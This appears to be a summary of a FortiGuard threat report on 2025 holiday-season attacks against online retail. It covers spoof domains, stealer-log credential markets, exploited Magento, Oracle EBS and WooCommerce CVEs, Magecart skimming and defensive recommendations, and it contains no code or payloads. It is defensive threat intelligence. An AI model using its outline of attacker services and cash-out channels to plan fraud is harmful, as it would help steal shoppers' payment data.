The 2025 holiday season shows a sharp rise in malicious, holiday-themed and e-commerce spoof domains, massive volumes of stealer-log credentials, and active exploitation of critical vulnerabilities across Magento, Oracle EBS, and WooCommerce. Organizations face industrialized, automated attacker services—AI-driven brute force, instant phishing hosting, and marketplace commoditization—that enable large-scale credential abuse and payment skimming. #Magento #WooCommerce
Keypoints
- Over the past three months FortiGuard observed >18,000 holiday-themed domains (≥750 confirmed malicious) and >19,000 e-commerce-themed domains (≈2,900 malicious) used for phishing, fake storefronts, and payment-harvesting campaigns.
- More than 1.57 million account credentials and associated browser artifacts were collected in stealer logs and indexed on underground marketplaces, enabling rapid credential stuffing and account takeover operations.
- Attackers are actively exploiting high-impact vulnerabilities—CVE-2025-54236 (Adobe/Magento), CVE-2025-61882 (Oracle E-Business Suite), and CVE-2025-47569 (WooCommerce plugin)—to achieve session takeover, RCE, data exfiltration, and disruption of order/inventory systems.
- Magecart-style JavaScript injection and other payment-skimming techniques remain prevalent, allowing real-time harvesting of checkout payment data from compromised pages.
- A mature, commoditized ecosystem (AI brute-force frameworks, credential-validation tools, instant phishing hosting, website-cloning services, SEO manipulation packages, and bulk proxy/VPN services) enables attackers to scale and automate holiday campaigns.
- Monetization channels—stealer-log marketplaces, discounted card dumps/CVV datasets, sales of customer databases, and offers of administrative/FTP access—accelerate cash-out operations and laundering during peak shopping periods.
- Fortinet recommends proactive measures—patching platforms/plugins, enforcing MFA, bot management, monitoring lookalike domains, scanning for unauthorized scripts/skimmers, and centralized logging—to mitigate holiday-season risks.
MITRE Techniques
- [T1190 ] Exploit Public-Facing Application – Vulnerabilities are being exploited for remote code execution and session takeover (‘this vulnerability is being exploited to achieve session takeover and remote code execution through improper input validation’).
- [T1110 ] Brute Force – AI-powered brute-force frameworks handle large volumes of login attempts with human-like timing to enable credential stuffing (‘AI-powered brute-force frameworks now handle large volumes of login attempts with human-like timing and behavior’).
- [T1078 ] Valid Accounts – Use of stolen credentials and stealer logs for account takeover and unauthorized purchases (‘more than 1.57 million login accounts… were collected across underground markets’ enabling credential stuffing and account takeover).
- [T1566 ] Phishing – Phishing and fraudulent storefronts are used to harvest credentials and payment data (‘These domains support phishing, fraudulent storefronts, gift card scams, and payment-harvesting schemes’).
- [T1056 ] Input Capture – Magecart-style JavaScript injection and skimmers capture payment data from checkout pages (‘Magecart-style JavaScript injection remains one of the most persistent and damaging threats, allowing attackers to skim payment data directly from checkout pages’).
- [T1068 ] Exploitation for Privilege Escalation – Vulnerabilities and plugin flaws are enabling privilege escalation within e-commerce platforms (‘vulnerabilities in plugins, templates, and API authentication are enabling payment skimming, XSS exploitation, privilege escalation, and unauthorized file uploads’).
- [T1105 ] Ingress Tool Transfer – Unauthorized file uploads and installation of backdoors on CMS platforms are used to persistently exfiltrate data and install skimmers (‘specialized services install payment skimmers or backdoors on CMS-based platforms, enabling long-term data theft’).
- [T1071 ] Application Layer Protocol – Command-and-control communications are addressed by defenses to prevent C2 from infected devices (‘FortiGuard Anti-botnet and C2 Service helps prevent command-and-control communication from infected devices on the network’).
Indicators of Compromise
- [Domains ] Holiday and e-commerce spoofing domains used for phishing and fraudulent storefronts – examples: domains containing ‘BlackFriday’ and ‘FlashSale’ used in >18,000 holiday-themed registrations (≈750 malicious), and >19,000 e-commerce-themed registrations (≈2,900 malicious).
- [Vulnerabilities ] Public CVE identifiers tied to active exploitation of e-commerce infrastructure – examples: CVE-2025-54236 (Adobe/Magento), CVE-2025-61882 (Oracle E-Business Suite), CVE-2025-47569 (WooCommerce plugin).
- [Credentials / Stealer Logs ] Stolen account data and browser artifacts sold on underground markets – examples: >1.57 million login accounts collected in stealer logs, including browser-stored passwords, cookies, session tokens, and autofill data.
- [Payment Data ] Card dumps, CVV datasets, and payment tokens used for fraud and cash-out operations – examples: discounted card dump listings and CVV datasets advertised in ‘holiday sales’ promotions on marketplaces.
- [Access Credentials / Backend Access ] Compromised administrative and FTP access offered for sale enabling direct site control – examples: listings for administrative or FTP access to high-revenue retail sites and millions of leaked WooCommerce records (and other database exports).